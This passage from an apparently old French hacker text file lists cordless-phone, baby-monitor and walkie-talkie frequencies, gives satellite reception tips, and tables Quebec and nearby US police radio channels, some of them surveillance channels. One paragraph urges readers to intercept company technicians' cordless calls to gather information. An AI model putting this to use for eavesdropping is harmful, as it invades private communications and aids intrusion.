49.930        1690KHz 01a avant 1984
49.970        46.970  10
49.970        1800KHz --- avant 1984
49.990        46.930  09 avant 1984

Il faut aussi savoir que les frquences 49.830MHz 49.845MHz et 49.875MHz
sont galement utilises dans des systmes d'interphone de surveillance
(babysiter).
Aussi, les walkie-talkie 49MHz oprent entre 49.830 et 49.990MHz


Alors avec ceci quoi de bon que de pouvoir espionnez des Cie ou n'importe 
quoi qui peut tre bon pour vos "plan" Ca fais simplement une manire de 
plus d'avoir des infos...y s'agit seulement de capter un technicien de 
rseau ou quelque personne dans ce style qui dtiennent des informations et 
c'est bien plus simple non? Malgr que oui faut la trouver cette frquence 
:)


-- Satellite --
Bon il n'est pas requis d'avoir de l'quipement spciale pour capter ces 
ondes. Une petite antenne horizontale peut faire l'affaire. Pour la majorit 
des frquences l'antenne devra tre oriente vers lest. Puisque la majorit 
des satellite inscrit dans es livre comme le mien sont situer au dessus de 
l'ocan. La meilleur rception se fais entre 10H00am et 14H00Pm. On 
recommande l'empli de amplificateur d'antenne les signaux tant faible. 
Assurez vous que l'amplificateur soir adapter pour les bandes VHF et UHF de 
50 a 900MHz. De cette faon l'amplificateur pourra servir pour la majorit 
des frquences de votre appareil. Et vous devriez avoir aussi un "Switch 
Box" Le fais de disconnecter la prise de courant aucun ondes ne passera dans 
l'amplificateur.


Notes:
Ce satellite est relier a une des agence secrte plus haut mais je ne sais 
plus laquelle alors vous avez juste a essayer. 931.9375 MHZ



****************************************************************************
-- Diverses liste de Frquences --
Notes: Par Neuro  Crdit: Guy, VE2VGA



                   Tlphones sans fils domestiques

BASE       MOBILES    MODELES, NOTES, DETAILS, ETC
902.10000  926.10000  PANASONIC KXT-9000, CH.01 ( MODELES 60 CANAUX ,
902.13000  926.13000  PANASONIC KXT-9000, CH.02            NUMERIQUE )
902.16000  926.16000  PANASONIC KXT-9000, CH.03
902.19000  926.19000  PANASONIC KXT-9000, CH.04
902.22000  926.22000  PANASONIC KXT-9000, CH.05
902.25000  926.25000  PANASONIC KXT-9000, CH.06
902.28000  926.28000  PANASONIC KXT-9000, CH.07
902.31000  926.31000  PANASONIC KXT-9000, CH.08
902.34000  926.34000  PANASONIC KXT-9000, CH.09
902.37000  926.37000  PANASONIC KXT-9000, CH.10
902.40000  926.40000  PANASONIC KXT-9000, CH.11
902.43000  926.43000  PANASONIC KXT-9000, CH.12
902.46000  926.46000  PANASONIC KXT-9000, CH.13
902.49000  926.49000  PANASONIC KXT-9000, CH.14
902.52000  926.52000  PANASONIC KXT-9000, CH.15
902.55000  926.55000  PANASONIC KXT-9000, CH.16
902.58000  926.58000  PANASONIC KXT-9000, CH.17
902.61000  926.61000  PANASONIC KXT-9000, CH.18
902.64000  926.64000  PANASONIC KXT-9000, CH.19
902.67000  926.67000  PANASONIC KXT-9000, CH.20
902.70000  926.70000  PANASONIC KXT-9000, CH.21
902.73000  926.73000  PANASONIC KXT-9000, CH.22
902.76000  926.76000  PANASONIC KXT-9000, CH.23
902.79000  926.79000  PANASONIC KXT-9000, CH.24
902.82000  926.82000  PANASONIC KXT-9000, CH.25
902.85000  926.85000  PANASONIC KXT-9000, CH.26
902.88000  926.88000  PANASONIC KXT-9000, CH.27
902.91000  926.91000  PANASONIC KXT-9000, CH.28
902.94000  926.94000  PANASONIC KXT-9000, CH.29
902.97000  926.97000  PANASONIC KXT-9000, CH.30
903.00000  927.00000  PANASONIC KXT-9000, CH.31
903.03000  927.03000  PANASONIC KXT-9000, CH.32
903.06000  927.06000  PANASONIC KXT-9000, CH.33
903.09000  927.09000  PANASONIC KXT-9000, CH.34
903.12000  927.12000  PANASONIC KXT-9000, CH.35
903.15000  927.15000  PANASONIC KXT-9000, CH.36
903.18000  927.18000  PANASONIC KXT-9000, CH.37
903.21000  927.21000  PANASONIC KXT-9000, CH.38
903.24000  927.24000  PANASONIC KXT-9000, CH.39
903.27000  927.27000  PANASONIC KXT-9000, CH.40
903.30000  927.30000  PANASONIC KXT-9000, CH.41
903.33000  927.33000  PANASONIC KXT-9000, CH.42
903.36000  927.36000  PANASONIC KXT-9000, CH.43
903.39000  927.39000  PANASONIC KXT-9000, CH.44
903.42000  927.42000  PANASONIC KXT-9000, CH.45
903.45000  927.45000  PANASONIC KXT-9000, CH.46
903.48000  927.48000  PANASONIC KXT-9000, CH.47
903.51000  927.51000  PANASONIC KXT-9000, CH.48
903.54000  927.54000  PANASONIC KXT-9000, CH.49
903.57000  927.57000  PANASONIC KXT-9000, CH.50
903.60000  927.60000  PANASONIC KXT-9000, CH.51
903.63000  927.63000  PANASONIC KXT-9000, CH.52
903.66000  927.66000  PANASONIC KXT-9000, CH.53
903.69000  927.69000  PANASONIC KXT-9000, CH.54
903.72000  927.72000  PANASONIC KXT-9000, CH.55
903.75000  927.75000  PANASONIC KXT-9000, CH.56
903.78000  927.78000  PANASONIC KXT-9000, CH.57
903.81000  927.81000  PANASONIC KXT-9000, CH.58
903.84000  927.84000  PANASONIC KXT-9000, CH.59
903.87000  927.87000  PANASONIC KXT-9000, CH.60
903.00000  927.00000  SAMSUNG SP-R912 ( MONOFREQUENCE )
75.97500   49.68000   TLPHONES SANS FILS 1-L (MODELES SPECIAUX IMPORTES
75.95000   49.71000   TLPHONES SANS FILS 2-L                    - RARES)
75.92000   49.74000   TLPHONES SANS FILS 3-L
75.90000   49.80000   TLPHONES SANS FILS 4-L
75.87000   49.77000   TLPHONES SANS FILS 5-L
75.85000   49.62000   TLPHONES SANS FILS 6-L
75.82500   49.65000   TLPHONES SANS FILS 7-L
75.80000   49.59000   TLPHONES SANS FILS 8-L
75.77500   49.56000   TLPHONES SANS FILS 9-L
75.75000   49.53000   TLPHONES SANS FILS 10-L
49.65000   26.51000   TLPHONES SANS FILS MODELE INCONNU ( RX )
1.69000    49.83000   TLPHONES SANS FILS ( ANCIENS MODELES - CANAL 1A )
1.71000    49.84500   TLPHONES SANS FILS ( ANCIENS MODELES - CANAL 2A )
1.73000    49.86000   TLPHONES SANS FILS ( ANCIENS MODELES - CANAL 3A )
1.75000    49.87500   TLPHONES SANS FILS ( ANCIENS MODELES - CANAL 4A )
1.77000    49.89000   TLPHONES SANS FILS ( ANCIENS MODELES - CANAL 5A )
43.72000   48.76000   TLPHONES SANS FILS (01/25) - Modeles courants
43.74000   48.84000   TLPHONES SANS FILS (02/25)            (USA/Canada).
43.82000   48.86000   TLPHONES SANS FILS (03/25)
43.84000   48.88000   TLPHONES SANS FILS (04/25)
43.92000   49.02000   TLPHONES SANS FILS (05/25)
43.96000   49.08000   TLPHONES SANS FILS (06/25)
44.12000   49.10000   TLPHONES SANS FILS (07/25)
44.16000   49.16000   TLPHONES SANS FILS (08/25)
44.18000   49.20000   TLPHONES SANS FILS (09/25)
44.20000   49.24000   TLPHONES SANS FILS (10/25)
44.32000   49.28000   TLPHONES SANS FILS (11/25)
44.36000   49.36000   TLPHONES SANS FILS (12/25)
44.40000   49.40000   TLPHONES SANS FILS (13/25)
44.46000   49.46000   TLPHONES SANS FILS (14/25)
44.48000   49.50000   TLPHONES SANS FILS (15/25)
46.61000   49.67000   TLPHONES SANS FILS (16/25) OU (01/10)
46.63000   49.84500   TLPHONES SANS FILS (17/25) OU (02/10)
46.67000   49.86000   TLPHONES SANS FILS (18/25) OU (03/10)
46.71000   49.77000   TLPHONES SANS FILS (19/25) OU (04/10)
46.73000   49.87500   TLPHONES SANS FILS (20/25) OU (05/10)
46.77000   49.83000   TLPHONES SANS FILS (21/25) OU (06/10)
46.83000   49.89000   TLPHONES SANS FILS (22/25) OU (07/10)
46.87000   49.93000   TLPHONES SANS FILS (23/25) OU (08/10)
46.93000   49.99000   TLPHONES SANS FILS (24/25) OU (09/10)
46.97000   49.97000   TLPHONES SANS FILS (25/25) OU (10/10)
30.07500   39.77500   TLPHONES SANS FILS (AUSTRALIE F 1/10)
30.10000   39.80000   TLPHONES SANS FILS (AUSTRALIE F 2/10)
30.12500   39.82500   TLPHONES SANS FILS (AUSTRALIE F 3/10)
30.15000   39.85000   TLPHONES SANS FILS (AUSTRALIE F 4/10)
30.17500   39.87500   TLPHONES SANS FILS (AUSTRALIE F 5/10)
30.20000   39.90000   TLPHONES SANS FILS (AUSTRALIE F 6/10)
30.22500   39.92500   TLPHONES SANS FILS (AUSTRALIE F 7/10)
30.25000   39.95000   TLPHONES SANS FILS (AUSTRALIE F 8/10)
30.27500   39.97500   TLPHONES SANS FILS (AUSTRALIE F 9/10)
30.30000   40.00000   TLPHONES SANS FILS (AUSTRALIE F10/10)
1.72500    40.02500   TLPHONES SANS FILS (AUSTRALIE M 1/5)
1.74000    40.07500   TLPHONES SANS FILS (AUSTRALIE M 2/5)
1.75500    40.12500   TLPHONES SANS FILS (AUSTRALIE M 3/5)
1.77000    40.17500   TLPHONES SANS FILS (AUSTRALIE M 4/5)
1.78500    40.22500   TLPHONES SANS FILS (AUSTRALIE M 5/5)
26.99500   49.86000   TLPHONES SANS FILS (PRE-1980 MONOFREQUENCE)
1.64200    47.45625   TLPHONES SANS FILS (UK CH 1)
1.66200    47.46875   TLPHONES SANS FILS (UK CH 2)
1.68200    47.48125   TLPHONES SANS FILS (UK CH 3)
1.70200    47.49375   TLPHONES SANS FILS (UK CH 4)
1.72200    47.50625   TLPHONES SANS FILS (UK CH 5)
1.74200    47.51875   TLPHONES SANS FILS (UK CH 6)
1.76200    47.53125   TLPHONES SANS FILS (UK CH 7)
1.78200    47.54375   TLPHONES SANS FILS (UK CH 8)
905.60000  925.50000  TROPEZ DX-900, CANAL 01
905.70000  925.60000  TROPEZ DX-900, CANAL 02
905.80000  925.70000  TROPEZ DX-900, CANAL 03
905.90000  927.80000  TROPEZ DX-900, CANAL 04
906.00000  925.90000  TROPEZ DX-900, CANAL 05
906.10000  926.00000  TROPEZ DX-900, CANAL 06
906.20000  926.10000  TROPEZ DX-900, CANAL 07
906.30000  926.20000  TROPEZ DX-900, CANAL 08
906.40000  926.30000  TROPEZ DX-900, CANAL 09
906.50000  926.40000  TROPEZ DX-900, CANAL 10
906.60000  926.50000  TROPEZ DX-900, CANAL 11
906.70000  926.60000  TROPEZ DX-900, CANAL 12
906.80000  926.70000  TROPEZ DX-900, CANAL 13
906.90000  926.80000  TROPEZ DX-900, CANAL 14
907.00000  926.90000  TROPEZ DX-900, CANAL 15
907.10000  927.00000  TROPEZ DX-900, CANAL 16
907.20000  927.10000  TROPEZ DX-900, CANAL 17
907.30000  927.20000  TROPEZ DX-900, CANAL 18
907.40000  927.30000  TROPEZ DX-900, CANAL 19
907.50000  927.40000  TROPEZ DX-900, CANAL 20
926.00000  902.05000  UNIDEN EXP-901, CANAL 01
926.05000  902.10000  UNIDEN EXP-901, CANAL 02
926.10000  902.15000  UNIDEN EXP-901, CANAL 03
926.15000  902.20000  UNIDEN EXP-901, CANAL 04
926.20000  902.25000  UNIDEN EXP-901, CANAL 05
926.25000  902.30000  UNIDEN EXP-901, CANAL 06
926.30000  902.35000  UNIDEN EXP-901, CANAL 07
926.35000  902.40000  UNIDEN EXP-901, CANAL 08
926.40000  902.45000  UNIDEN EXP-901, CANAL 09
926.45000  902.50000  UNIDEN EXP-901, CANAL 10
926.50000  902.55000  UNIDEN EXP-901, CANAL 11
926.55000  902.60000  UNIDEN EXP-901, CANAL 12
926.60000  902.65000  UNIDEN EXP-901, CANAL 13
926.65000  902.70000  UNIDEN EXP-901, CANAL 14
926.70000  902.75000  UNIDEN EXP-901, CANAL 15
926.75000  902.80000  UNIDEN EXP-901, CANAL 16
926.80000  902.85000  UNIDEN EXP-901, CANAL 17
926.85000  902.90000  UNIDEN EXP-901, CANAL 18
926.90000  902.95000  UNIDEN EXP-901, CANAL 19
926.95000  903.00000  UNIDEN EXP-901, CANAL 20
927.00000  903.05000  UNIDEN EXP-901, CANAL 21
927.05000  903.10000  UNIDEN EXP-901, CANAL 22
927.10000  903.15000  UNIDEN EXP-901, CANAL 23
927.15000  903.20000  UNIDEN EXP-901, CANAL 24
927.20000  903.25000  UNIDEN EXP-901, CANAL 25
927.25000  903.30000  UNIDEN EXP-901, CANAL 26
927.30000  903.35000  UNIDEN EXP-901, CANAL 27
927.35000  903.40000  UNIDEN EXP-901, CANAL 28
927.40000  903.45000  UNIDEN EXP-901, CANAL 29
927.45000  903.50000  UNIDEN EXP-901, CANAL 30
927.50000  903.55000  UNIDEN EXP-901, CANAL 31
927.55000  903.60000  UNIDEN EXP-901, CANAL 32
927.60000  903.65000  UNIDEN EXP-901, CANAL 33
927.65000  903.70000  UNIDEN EXP-901, CANAL 34
927.70000  903.75000  UNIDEN EXP-901, CANAL 35
927.75000  903.80000  UNIDEN EXP-901, CANAL 36
927.80000  903.85000  UNIDEN EXP-901, CANAL 37
927.85000  903.90000  UNIDEN EXP-901, CANAL 38
927.90000  903.95000  UNIDEN EXP-901, CANAL 39
927.95000  904.00000  UNIDEN EXP-901, CANAL 40


****************************************************************************

                 Frquences de services de police municipaux
                               9 Janvier 2000



    Frquence  Indicatif  CTCSS  Localit                    Notes et dtails

    154.32500  XJF 546    118.8  ACTON VALE                  SSI
    154.67500  XJI 39        ?   ALMA                        Avec incendies.
    154.31000  XJI 39            ALMA                        Frquence 2 ? -
    453.47500  KNGQ 602   127.3  ALTONA (CLINTON COUNTY),NY  VERIFIE DANS PERCON=ok.ANI MOBILE
    154.37000  XJF 605           AMOS
    411.60000  XJF 892           ARTHABASKA
    411.70000  XJH 39            ASBESTOS
    412.11250  XJF 531           AYLMER
    154.25000  XJG 64            BAIE COMEAU
    155.07000  XJG 64            BAIE COMEAU
    153.89000                    BAIE COMEAU                 DE INFO MEDAQ
    159.09000  ?                 BAIE COMEAU                 DE INFO MEDAQ
    159.21000  XJF 80     100.0  BEAUHARNOIS                 AUTRE RPT A 151.265 (PARALLELE)
    151.26500        ?    100.0  BEAUHARNOIS                 NEW JUIL 99 EN // AVEC 159.210 RPR # 2
    410.16250  XJO 845*   110.9  BEAUHARNOIS                 PHONE PATCH. VOIR VALLEYFIELD     159.210/151.265
  **155.28000**XJF 616****156.7**BEAUPORT                    PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUBEC
  **155.61000**XJF 616****156.7**BEAUPORT                    PLUS EN FONCTION - COUVERT PAR LA VILLE DE QUBEC
    154.04000  XJF 894           BEAUPRE
    151.19000  XJG 467        ?  BECANCOUR                   A REVOIR
    153.95000  XJF 719    100.0  BEDFORD
    410.23750  XJF 719?   114.8  BEDFORD                     NOUVEAU 97.
    411.48750  XJF 47     123.0  BELOEIL
    155.58000  KLL 714           BENNINGTON .VT              LOCAL POLICE
    155.52000       ?            BENNINGTON.VERMONT
    411.67500  XJG 48            BERTHIERVILLE
    410.08750  XLP 792           BISHOPTON
    154.17500  XJK 26            BLACK LAKE
    412.96250  XJH 224    123.0  BLAINVILLE
    411.88750     ?       141.3  BOIS DES FILION             AVEC TERREBONNE.
    410.28750  XJF 725    141.3  BOISBRIAND
    410.16250  XJF 552    123.0  BOUCHERVILLE
    154.40000        ?           BRADFORD, VERMONT
    154.01000  XJF 212    100.0  BROMONT                     ROLLING CODE A L'OCCASION
    154.04000  XJF 729           BROMPTONVILLE
    412.01250  XJF 498    100.0  BROSSARD
    413.01250  XJF 498    100.0  BROSSARD
    154.92000  XJF 791           BROWNSBURG
    155.73000  ?             ?   CANAL 2                     DE INFO MEDAQ.
    413.38750  XJG 425    156.7  CANDIAC
    412.56250  XJG 425    156.7  CANDIAC                     CANDIAC, DELSON, ST CONSTANT
    411.03750  VDE 238           CANDIAC                     CENTRE 9-1-1. 90 RUE MONTCALM.
    154.84500  XJF 75            CAP DE LA MADELEINE
    155.43000  XJF 75            CAP DE LA MADELEINE
    410.23750  VBN 896    100.0  CARIGNAN
    411.63750  XJF 746    114.8  CHAMBLY
    151.29500  XJF 852           CHAPAIS
    411.63750  XJI 270    123.0  CHARLEMAGNE                 ENCODAGE SSI. CHARLEMAGNE/LEGARDEUR
    411.38750  XJG 489           CHARLESBOURG                ENQUETEURS - BROUILLAGE NUMERIQUE
    412.11250  XJG 489    162.2  CHARLESBOURG                F-1 (F-2 = 408.0375)
    408.03750  XJG 489    162.2  CHARLESBOURG                F-2 (F-1 = 412.1125)
    411.11250  XJN 248    167.9  CHATEAUGUAY
    411.63750  XJF 912    100.0  CHAUDIRE-ETCHEMIN          BROUILLEUR NON-PERMANENT (INFO-
    410.36250  ?          100.0? CHAUDIRE-ETCHEMIN          CANAL 2 BROUILLEUR NON PERMANENT.INFO-MEDAQ.
    154.31000  XJF 613           CHIBOUGAMAU
    410.40000  XJN 283           CHICOUTIMI
    154.65000  XJF 590           COATICOOK                   BROUILLEUR
    411.58750  XJO 883     71.9  CONTRECOEUR                 POLICE DE STE JULIE
    142.03500          ?  162.2  CORNWALL, ON                RECU EN INVERSIONS (DE TEMPRATURE)
    154.01000  XJF 212    100.0  COWANSVILLE                 ROLLING CODE A L'OCCASION
    154.16000  XJG 461    100.0  CRABTREE                    POSTE DE POLICE DE JOLIETTE
    413.31250  XJF 448    100.0  DELSON
    412.56250  XJG 425    156.7  DELSON                      CANDIAC, DELSON, ST CONSTANT
    411.68750  XJF 448    123.0  DELSON                      PP
    412.91250  XJI  59*** 131.8  DEUX MONTAGNES              PASSE SUR EDACS 866 MHZ
    867.31250  XJI  59?    TRK   DEUX MONTAGNES              TRUNKING EDACS, POLICE RGIONALE.
    866.81250  XJI  59?    TRK   DEUX MONTAGNES              TRUNKING EDACS. POLICE RGIONALE.
    866.31250  XJI  59?    TRK   DEUX MONTAGNES              TRUNKING EDACS. POLICE REGIONALE.
    154.37000  XJF 326           DOLBEAU
    158.97000  XJF 456           DONNACONA
    411.15000  XJI 24     107.2  DRUMMONDVILLE
    413.31250  XJI 24     107.2  DRUMMONDVILLE
    412.86250  XJI 24     107.2  DRUMMONDVILLE               DATA TIM SANS CTCSS. VOIX AVEC CTCSS
    412.33750  XJF 608           DRUMMONDVILLE               PROTECTION PUBLIQUE
    158.97000  XJF 328           EAST ANGUS                  CONFIRME A.LAF. 23-10-99.
    411.70000  XJF 572    114.8  FARNHAM                     ENCODAGE SSI
    153.95000  XJL 602           FERMONT
    154.69500  KUZ 980           FINENEW YORK
    158.97000  XJF 888           FORESTVILLE
    154.02500  XLP 743           GASPE
    154.02500  XLP 744           GASPE
    154.02500  XLP 745           GASPE
    154.04000  XJF 95     110.9  GATINEAU
    154.57000  XJF 940    110.9  GATINEAU
    154.98000  XJF 95     110.9  GATINEAU
    154.98000  XJF 940    110.9  GATINEAU
    154.98000  XJI 250    110.9  GATINEAU
    154.25000  XJN 588    110.9  GRANBY
    155.16000  XJF  68    110.9  GRANBY
    155.50500  XJF 68     110.9  GRANBY
    154.25000  XJF 68     110.9  GRANBY                      SSI (VSB) ET NORMAL
    411.57500  VOR 713*   114.8  GRANBY (CANTONS DE)         ENCODAGE SSI. REVOIR INDICATIF
    153.95000  XJN 590    110.9  GRAND MERE
    154.35500                    GRAND MERE                  DATA.A REVOIR
    159.21000  XJF 80     100.0  GRANDE ILE                  AUTRE RPT A 151.265 (PARALLELE)
    151.26500        ?    100.0  GRANDE ILE                  NEW JUIL 99 EN // AVEC 159.210 RPT # 2
    412.78750  XJG 38     123.0  GREENFIELD PARK
    412.88750  XJI 94     173.8  GREENFIELD PARK
    411.65000  XJF 297           HUDSON
    411.61250  XJF 297    107.2  HUDSON                      MAJ 311296
    412.01250  XJI 46            HULL
    412.33750  XJK 214    110.9  HULL
    412.98750  XJK 214    110.9  HULL
    413.03750  ?          110.9  HULL
    411.66250  XJI 211           HUNTINGDON
    154.77000  XJK 43            IBERVILLE
    412.11250  XJK 43     100.0  IBERVILLE
    154.16000  XJG 461    100.0  JOLIETTE                    ACI RX (800 HZ)
    410.10000  XJN 280           JONQUIERE
    410.90000  XJL 658           JONQUIERE
    411.98750  ?          123.0  KAHNAWAKE                   PEACE KEEPER
    154.01000  XJN 514           KIPAWA
    151.14500  XJF 787    114.8  L'ANCIENNE LORETTE          OPERATIONS. AVEC INCENDIES.
    412.56250  XJF 284    114.8  L'ASSOMPTION                ENCODAGE SSI
    410.01250  ?                 LA BAIE
    411.66250  ?           94.8  LA PLAINE                   SSI.
    154.13000  XJF 749           LA POCATIERE
    412.21250  XJG 90     123.0  LA PRAIRIE                  RPT VOIX AVEC PL/DATA SANS PL.
    154.31000  XJF 792           LA SARRE
    411.60000  XJG 495           LA TUQUE
    151.53500  XJN 205           LAC BEAUPORT                INCENDIES ?
    410.93750  XJF 829    118.8  LAC BROME (KNOWLTON)        ENCODAGE SSI
    411.60000  XJF 717           LAC MEGANTIC
    411.01250  XJK 952    141.3  LACHENAIE                   ENCODAGE SSI PERMANENT.
    154.40000  XJH 28            LACHUTE
    411.98750  XJH 28            LACHUTE
    169.68000  ?          100.0  LAURENTIDES / ST LIN        ENCODAGE SSI A L'OCCASION
    173.79000  MOBILES>   100.0  LAURENTIDES / ST-LIN        ENTREE REPETEUR DE 169.680
    412.38750  ?          156.7  LAUZON
    143.02500  XJF 586    103.5  LAVAL
    143.02500  XJK 912    103.5  LAVAL
    143.29500  XJF 586    103.5  LAVAL
    143.29500  XJK 912    103.5  LAVAL
    143.41500  XJF 586    103.5  LAVAL
    143.41500  XJK 912    103.5  LAVAL
    143.59500  XJF 586    103.5  LAVAL
    143.59500  XJK 912    103.5  LAVAL
    143.92500  XJF 586    103.5  LAVAL
    143.92500  XJK 912    103.5  LAVAL
    151.35500  XJF 586    103.5  LAVAL                       SIMPLEX ENQUETES
    151.23500  XJF 586    103.5  LAVAL                       SIMPLEX ENQUETEURS
    410.68750  ?                 LE GARDEUR
    411.63750  XJF 577    123.0  LE GARDEUR                  ENCODAGE SSI + TIM (o PL) CHARLEMAGNE/LEGARDEUR
    154.37000  XJF 797           LEBEL SUR QUEVILLON
    411.62500  XJF 617           LENNOXVILLE
    412.56250  XJO 802           LENNOXVILLE
    411.60000  XJG 451    123.0  LERY                        114.8 hz?
    412.98750  ?          156.7  LEVIS                       CANAL 1 (AVEC INCENDIES) BROUILLNONPERM.
    412.38750  ?
                                 LEVIS                       CANAL 2 (AVEC INCENDIES) BROUILLNON PERM
    413.51250  ?          156.7  LEVIS                       CANAL 3 AVEC INCENDIES
    412.06250  XJG 55     110.9  LONGUEUIL                   F 01 - GENERAL (RCC C.H.P.B.).
    412.38750  XJG 55     110.9  LONGUEUIL                   F 02 - DEGAGEMENT.
    412.98750  XJG 55     110.9  LONGUEUIL                   F 03 - INFORMATIONS (CRPQ)
    412.58750  XJG 55     110.9  LONGUEUIL                   F 04 - NUMERIQUE GENRE SQ A L'OCCASION.
    412.96250  XJG 429    136.5  LORETTEVILLE
    413.48750  XJG 429           LORETTEVILLE
    410.53750  XJF 754    118.8  LORRAINE
    453.47500  KNHM 983   110.9  LYON MOUNTAIN (CLINTON CTY) NY LINK ?
    154.69500  WRG 846           LYON MOUNTAIN, NY
    410.31250  ?          100.0  MAGOG
    453.40000  ??? 542    123.0  MALONE, NEW YORK
    155.01000  XJK 932           MANIWAKI
    411.66250  XJF 783    100.0  MARIEVILLE
    413.38750  ?          136.5  MASCOUCHE
    411.98750  ?          136.5  MASCOUCHE                   OK
    154.04000  XJF 460           MASSON-ANGERS
    155.61000  XJF 555           MATANE
    155.79000  XJF 555           MATANE
    159.21000  XJF 80     100.0  MELOCHEVILLE                AUTRE RPT A 151.265 (PARALLELE)
    151.26500        ?    100.0  MELOCHEVILLE                NEW JUIL 99 EN // AVEC 159.210 RPT # 2
    411.63750  XJO 841    167.9  MERCIER                     ENCODAGE SSI
    412.86250  ?          167.9  MIRABEL                     POLICE INTERMUNICIPALE. LIEN AVEC 411.5875 ?
    411.58750  XJF 576    123.0  MIRABEL                     XJN575 ?   VOIR AUSSI 412.8625 (NOUVEAU)
    159.21000  XJF 313           MONT JOLI
    153.80000  XJG 428           MONT LAURIER
    151.29500  XJF 895           MONT ROLAND                 ST DONAT
    411.56250  XJG 324    100.0  MONT ST HILAIRE
  **158.97000  XJF 387********** MONTMAGNY                   PLUS EN FONCTION - VOIR UHF
    410.11250  XJF 387      ?    MONTMAGNY                   OK
    410.48750  XJN 335    203.5  MONTREAL
    408.03750  XJN 341    203.5  MONTREAL
    408.16250  XJN 341    203.5  MONTREAL
    408.21250  XJN 335    203.5  MONTREAL
    408.26250  XJN 341    203.5  MONTREAL
    408.43750  XJK 980    203.5  MONTREAL
    408.43750  XJN 335    203.5  MONTREAL
    408.53750  XJN 335           MONTREAL
    408.61250  XJN 341           MONTREAL
    408.66250  XJN 341           MONTREAL
    410.11250  XJN 335    203.5  MONTREAL
    410.26250  XJN 335    203.5  MONTREAL
    410.36250  XJN 335    203.5  MONTREAL
    410.58750  XJN 335    203.5  MONTREAL
    410.61250  XJN 335    203.5  MONTREAL
    410.78750  XJN 335    203.5  MONTREAL
    410.91250  XJN 335    203.5  MONTREAL
    410.96250  XJN 335    203.5  MONTREAL
    411.18750  XJN 335    203.5  MONTREAL
    411.37500  XJN 335    203.5  MONTREAL
    411.53750  XJN 335    203.5  MONTREAL
    412.13750  XJN 335    203.5  MONTREAL
    413.23750  XJK 970    203.5  MONTREAL
    413.23750  XJN 335    203.5  MONTREAL
    413.53750  XJN 335    203.5  MONTREAL
    413.61250  XJN 335    203.5  MONTREAL
    413.73750  XJN 335    203.5  MONTREAL
    413.78750  XJN 335    203.5  MONTREAL
    415.66250  XJN 335    203.5  MONTREAL
    418.21250  XJN 335           MONTREAL
    418.38750  XJN 335    203.5  MONTREAL
    418.73750  XJN 335           MONTREAL
    418.86250  XJK 274           MONTREAL
    410.66250  XJN 335    203.5  MONTREAL                    1- 8 : SIMPLEX (ENQUETES,SUIVI,ETC)
    408.41250  XJN 335    203.5  MONTREAL                    ACI RX (1225 HZ)
    408.51250  XJN 335    203.5  MONTREAL                    ACI RX, SURVEILLANCE UNITES 91
    412.68750  XJN 335    203.5  MONTREAL                    CANAL 09 - OPS SPECIALES
    411.31250  XJN 335    203.5  MONTREAL                    CANAL 10 - OPS SPECIALE
    418.23750  XJN 335           MONTREAL                    CANAL 4 - 7 NUMRIQUE
    413.76250  XJN 335    203.5  MONTREAL                    CANAL ? (APPELE LE V.V.M.)
    413.66250  XJN 335    203.5  MONTREAL                    CTCSS SI PAS NUMERIQUE CANAL TACTIQUE (AUTOS 72-X)
    408.31250  XJN 335    203.5  MONTREAL                    CTCSS SUR ANALOGUE SINON DVP
    418.11250  XJN 335    203.5  MONTREAL                    DVP UTILISE ET ANALOGUE RARE
    413.18750  XJN 335    203.5  MONTREAL                    DVP=0 PL. 203=ANALOGUE
    413.11250  XJN 335    203.5  MONTREAL                    DVP=O PL. 203 = ANALOGUE
    408.11250  XJN 335    203.5  MONTREAL                    ENCODAGE DVP UTILISE SOUVENT
    418.46250  XJN 335    203.5  MONTREAL                    PL SI PAS EN DVP
    410.91250  XJK 968           MONTREAL                    POSTE ? CW ID RX
    410.36250  XJK 968    -----  MONTREAL                    POSTE. CW ID RX (1300 HZ)
    410.26250  XJN 341    203.5  MONTREAL                    POSTES
    418.78750  XJN 335           MONTREAL                    SURVEILLANCE
    418.18750  XJN 341           MONTREAL                    SURVEILLANCE PHYSIQUE (DVP)
    408.63750  XJN 335    203.5  MONTREAL                    V.A. VOLES (VVM) / HELICO RX
    411.46250    ?        DVP    MONTREAL                    SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI A QUBEC
    411.51250    ?        DVP    MONTREAL                    SQ ? RPT NUMERIQUE ASSEZ ANCIEN. ENTENDU AUSSI  QUBEC
    410.51250    ?        DVO    MONTREAL                    SQ ? RPT NUMERIQUE ASSEZ ANCIEN.
    412.68750  XJK 980           MONTREAL (MONTAGNE)         CANAL 09 - RPT G.E.
    411.31250  XJK 980           MONTREAL (MONTAGNE)         CANAL 10 - RPT G.E.
    410.36250  XJN 486           MONTREAL (MONTAGNE)         REPETEUR
    410.26250  XJN 486           MONTREAL (MONTAGNE)         REPETEUR (ACI RX : 1200 HZ)
    410.61250  XJN 486           MONTREAL (MONTAGNE)         REPETEUR (ACI RX : 1500 HZ)
    410.91250  XJN 486           MONTREAL (MONTAGNE)         REPETEUR (RX AUSSI XJK 968)
    410.11250  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    410.48750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    410.58750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    410.78750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    410.96250  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    411.37500  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    411.53750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    412.13750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E.
    410.61250  XJK 969           MONTREAL (MONTAGNE)         RPT G.E. - MT ROYAL.
    410.81250  XJK 980           MONTREAL (MONTAGNE)         RPT G.E. - T.I.M.3 (DATA)
    410.03750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E. - TIM 1,CW ID RX
    410.33750  XJK 980           MONTREAL (MONTAGNE)         RPT G.E. - TIM 2 ACIRX
    411.21250  XJK 980           MONTREAL (MONTAGNE)         RPT G.E. - TIM 4 (DATA)
    155.76000  XJF 807           MT ADSTOCK                  RPT MT ADSTOCK.
    411.63750  ?                 NEW GLASGOW
    154.69500  WXM 690           NEW YORK STATE
    154.69500  KQI 740           NEW YORK STATE.
    411.65000  XJG 375    103.5  NICOLET
    413.70000  XJG 375           NICOLET
    155.64500  ?                 NORTH CONWAY NY
    411.57500  XJL 606    107.2  NOTRE DAME DE L'ILE PERROT
    411.68750  XJL 606    151.4  NOTRE DAME DE L'ILE PERROT
